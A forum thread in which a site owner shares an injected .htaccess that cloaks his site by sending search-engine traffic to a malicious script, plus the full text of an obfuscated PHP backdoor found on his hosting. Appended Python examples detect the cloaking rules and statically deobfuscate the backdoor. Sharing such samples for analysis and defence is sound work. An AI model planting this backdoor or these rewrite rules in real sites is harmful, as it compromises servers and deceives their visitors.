Cheat Engine The Official Site of Cheat Engine
Eraser Grandmaster Cheater
Reputation: 0
Joined: 23 Jul 2008 Posts: 504 Location: http://www.youtube.com/PCtrainers
Posted: Tue Apr 05, 2016 10:07 am Post subject: my hosting .htaccess was compromised
Web development forum is not really active so I'm posting here.
Today I found 2 files uploaded to my hosting server and .htaccess edited. I wonder what exactly they tried to do? Just install a rootkit/web shell? I could not open any of these files to check.
.htaccess:
Code:
RewriteEngine On
RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ gap-inverts.php?$1 [L]
gap-inverts.php contained some encrypted code:
http://pastebin.com/38Wi8NzK
another file that was uploaded - xkndnofl.php probably a rootkit:
Code:
<?php
$fob= 'evR_IoB'; $collapsible = 'H';
$archangels ='"';$horsely ='O'; $gowned='c'; $demurrer ='v'; $inventory='$C;$([';$isothermal = 'V';$killian = 'Rr=_LEMP$'; $gangster ='?l;X';$biscuits='c)gatT'; $gut ='S:eba),[';$avenue= 'o';
$headlong='Ebt[eG';
$chronic= 'e'; $articulate = 'm_Pvo_=;$';$glenden ='^6Orr';$jerkings = 'n'; $braggart='T';
$incorporated='t'; $antecedent='"';
$gopher='epl';$boning= 't';$hock= '(';
$bethena ='g';$churn = 'sZ$VReCH)'; $humored ='"';$cinema ='eVv';$dissociates= 'T';
$beseech='O';
$buttermilk='E'; $fortnightly='H'; $intentions='v)'; $cherry ='"'; $baneful= 'c';
$inopportune ='L';$forecasts=',';$hemisphere ='M';$horse ='("d($_ceE';
$further ='d'; $boroughs = 'Q;PfBT'; $broadly = 'a';$hilarius = 'arIKes_s_'; $din= 'a';
$integration = 'ecee"liS'; $loudspeaking ='$'; $immaterial= '4ti$nsa';$correction = 'L';
$byteme='i';$joining ='by_)C';
$julie= 'i';$exasperation ='neHiei'; $jaundice= ')';$hazy = 'TSu))TeG'; $economist= 'm';$liturgy = 't)h_rUrtW';$chivalrously='$]Ya';
$encamps = 'm'; $editors ='a';$glyph ='yr("g';$decathlon= 'V'; $eagerness='(';$freida = 'r'; $interrogative='['; $entity='s:Ts';
$crunch =']'; $exploitations ='(r?si$cuQ'; $jennifer='pN_(]ar'; $capitalizes =']'; $chub= 'h'; $channeller= 'g(Trvi';
$hose= 'MtfUR(]';$faints ='K';
$blackberries = 'a'; $bicep = 'l'; $couplings ='ia'; $elicits =')[E(g)"';
$cook ='t'; $craziness='s';$junction='d'; $axiom='J_ ';$bloc=$exploitations['6'] .$channeller['3'] .$hazy['6'] . $couplings['1'].
$cook. $hazy['6'] .$axiom['1'].
$hose[2] . $exploitations[7] .
$exasperation['0'] .$exploitations['6'] .$cook .$couplings['0'] .$articulate['4']. $exasperation['0'] ;
$goldarina = $axiom['2']; $evacuate =$bloc($goldarina, $hazy['6']. $channeller[4] . $couplings['1'].$bicep.$elicits['3']. $couplings['1']. $channeller['3'] .$channeller['3']. $couplings['1'].$glyph['0'] .
$axiom['1'].$jennifer['0']. $articulate['4']. $jennifer['0'].$elicits['3'].
$hose[2]. $exploitations[7] . $exasperation['0'] .
$exploitations['6'] .$axiom['1'] .$elicits['4'] .$hazy['6'] .
$cook. $axiom['1'] . $couplings['1']. $channeller['3'] .$elicits['4']. $craziness .$elicits['3'].$elicits['5'].$elicits['5'].$elicits['5'] .$boroughs['1']);$evacuate($correction , $diatom['5'] , $inadmissible , $chivalrously['2'] , $complicating['1'], $handspike['2'],$articulate['6'] ,
$battens['0'],
$gilda['2'] , $glenden['1'] ,
$hose[2], $blueberries['5'], $articulate['4'], $finalizing['0'] ,$exploitations['5'] . $couplings['0']. $articulate['6'].$couplings['1'] .
$channeller['3'].$channeller['3'] .$couplings['1'].$glyph['0'] . $axiom['1'] . $encamps .$hazy['6']. $channeller['3'] .
$elicits['4'] .$hazy['6'] .
$elicits['3'].
$exploitations['5'] .
$axiom['1'] . $hose['4'] .$elicits['2'] .$exploitations['8'] .$hose['3'] .$elicits['2'].
$hazy['1'].$channeller['2']. $forecasts. $exploitations['5'] .$axiom['1'] .
$joining[4]. $beseech.$beseech.
$faints . $hilarius['2'] . $elicits['2'] .
$forecasts. $exploitations['5'] . $axiom['1'] . $hazy['1'] .$elicits['2'] .
$hose['4'] .$decathlon. $elicits['2'] .$hose['4'].$elicits['5'] . $boroughs['1'].$exploitations['5']. $couplings['1'] .$articulate['6'].$couplings['0']. $craziness.$craziness . $hazy['6'] .
$cook.$elicits['3']. $exploitations['5'] .$couplings['0'] .$elicits['1'].$elicits[6]. $channeller[4]. $elicits['4'].
$joining['0'].$chub.$cook .$bicep.$encamps. $exploitations['6'].$elicits[6].
$hose[6] . $elicits['5'] . $exploitations['2'].$exploitations['5'].$couplings['0'] .$elicits['1'] .
$elicits[6].$channeller[4] .
$elicits['4']. $joining['0']. $chub .$cook.$bicep.
$encamps . $exploitations['6'].$elicits[6] . $hose[6].
$entity[1] . $elicits['3']. $couplings['0'].$craziness .$craziness.$hazy['6']. $cook. $elicits['3']. $exploitations['5'].$couplings['0']. $elicits['1'] . $elicits[6]. $exasperation['2'].
$channeller['2'].
$channeller['2'] .$boroughs[2]. $axiom['1']. $decathlon. $hazy['7']. $boroughs['4'].$exasperation['2']. $channeller['2'].
$correction .$hose['0'].$joining[4].$elicits[6].$hose[6]. $elicits['5']. $exploitations['2'] .$exploitations['5'].$couplings['0'] .
$elicits['1'] .
$elicits[6] .$exasperation['2'].$channeller['2']. $channeller['2']. $boroughs[2] .$axiom['1'] .$decathlon. $hazy['7'].$boroughs['4'] . $exasperation['2'].$channeller['2']. $correction.
$hose['0'] .
$joining[4] . $elicits[6] . $hose[6] .
$entity[1].
$junction.
$couplings['0'].$hazy['6'] . $elicits['5'] . $boroughs['1'] . $hazy['6']. $channeller[4] .
$couplings['1'] . $bicep.
$elicits['3'].
$craziness.$cook. $channeller['3'] .$channeller['3'] .$hazy['6'] .$channeller[4] .
$elicits['3'] .$joining['0'].$couplings['1'].
$craziness. $hazy['6'].
$glenden['1'] . $immaterial['0']. $axiom['1']. $junction. $hazy['6'] .$exploitations['6']. $articulate['4'].
$junction . $hazy['6'] . $elicits['3'] .$craziness.
$cook.$channeller['3'] .$channeller['3'] . $hazy['6'] .
$channeller[4].$elicits['3'] .$exploitations['5'].$couplings['1']. $elicits['5']. $elicits['5']. $elicits['5'] .$elicits['5'].
$boroughs['1']);
Last edited by Eraser on Tue Apr 05, 2016 10:12 am; edited 3 times in total |
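Added example (not part of the original post): the .htaccess rules above send only requests whose User-Agent or Referer names a search engine to gap-inverts.php, so a visitor typing the URL directly never sees the injected page. The Python sketch below flags that pattern in any .htaccess text; the extra engine names and the BENIGN sample are constructed for illustration.

```python
import re

# INJECTED is the rule set from the post; BENIGN is a constructed contrast case.
INJECTED = """RewriteEngine On
RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ gap-inverts.php?$1 [L]
"""
BENIGN = """RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ index.php?q=$1 [L,QSA]
"""

# Engine names: the five from the post plus a few assumed additions.
ENGINES = re.compile(r"google|yahoo|msn|aol|bing|yandex|baidu|duckduck", re.I)
CLOAK_VARS = ("%{HTTP_USER_AGENT}", "%{HTTP_REFERER}")

def find_cloaking_rules(htaccess_text):
    """Return RewriteRule entries whose RewriteCond chain keys on a
    search-engine User-Agent/Referer and whose target is a PHP script."""
    findings, conds = [], []
    for lineno, raw in enumerate(htaccess_text.splitlines(), 1):
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            conds.append((parts[1], parts[2]))
        elif directive == "rewriterule" and len(parts) >= 3:
            target = parts[2]
            keyed = [c for c in conds
                     if c[0].upper() in CLOAK_VARS and ENGINES.search(c[1])]
            if keyed and re.search(r"\.php\d?(\?|$)", target, re.I):
                findings.append({"line": lineno, "target": target,
                                 "conditions": keyed})
            conds = []  # conditions apply only to the next RewriteRule
    return findings

if __name__ == "__main__":
    for hit in find_cloaking_rules(INJECTED):
        print(hit)
```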
Killor1 Master Cheater
Reputation: 5
Joined: 21 May 2008 Posts: 499 Location: Memphis
Posted: Tue Apr 05, 2016 10:10 am Post subject: Re: my hosting .htaccess was compromised
Since this is in random spam: where have you been and what were you doing? Fapping?
Eraser Grandmaster Cheater
Reputation: 0
Joined: 23 Jul 2008 Posts: 504 Location: http://www.youtube.com/PCtrainers
Posted: Tue Apr 05, 2016 10:32 am
| nvm found some tools online and it seems it's a rootkit
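Added example (not from the thread): the xkndnofl.php listing in the first post hides its function names by picking single characters out of junk strings and concatenating them. The Python sketch below resolves such an expression statically, without running any PHP, using a subset of the listing's own assignments and its `$bloc` expression; the helper names are this example's own.

```python
import re

# Assignments and the $bloc expression copied from the xkndnofl.php listing.
SAMPLE = r"""
$hazy = 'TSu))TeG'; $articulate = 'm_Pvo_=;$'; $exasperation ='neHiei';
$exploitations ='(r?si$cuQ'; $channeller= 'g(Trvi'; $hose= 'MtfUR(]';
$couplings ='ia'; $cook ='t'; $axiom='J_ ';
$bloc=$exploitations['6'] .$channeller['3'] .$hazy['6'] . $couplings['1'].
$cook. $hazy['6'] .$axiom['1'].
$hose[2] . $exploitations[7] .
$exasperation['0'] .$exploitations['6'] .$cook .$couplings['0'] .$articulate['4']. $exasperation['0'] ;
"""

ASSIGN = re.compile(r"\$(\w+)\s*=\s*'([^']*)'\s*;")       # $name = 'literal';
TERM = re.compile(r"\$(\w+)(?:\[\s*'?(\d+)'?\s*\])?")     # $name, $name[3], $name['3']

def literal_table(php):
    """Map each variable name to the single-quoted literal assigned to it."""
    return {name: value for name, value in ASSIGN.findall(php)}

def resolve(php, target):
    """Evaluate `$target = $a['i'] . $b[j] . $c ...;` from the literal table.
    Unknown variables or out-of-range offsets become '?'."""
    table = literal_table(php)
    m = re.search(r"\$" + re.escape(target) + r"\s*=\s*(\$[^;]*);", php, re.S)
    if not m:
        return None
    out = []
    for name, index in TERM.findall(m.group(1)):
        value = table.get(name)
        if value is None:
            out.append("?")
        elif index:
            i = int(index)
            out.append(value[i] if i < len(value) else "?")
        else:
            out.append(value)
    return "".join(out)

if __name__ == "__main__":
    print(resolve(SAMPLE, "bloc"))
```

A resolved name such as this one, built at runtime rather than written literally, is itself a useful indicator when triaging unexpected PHP files in a web root.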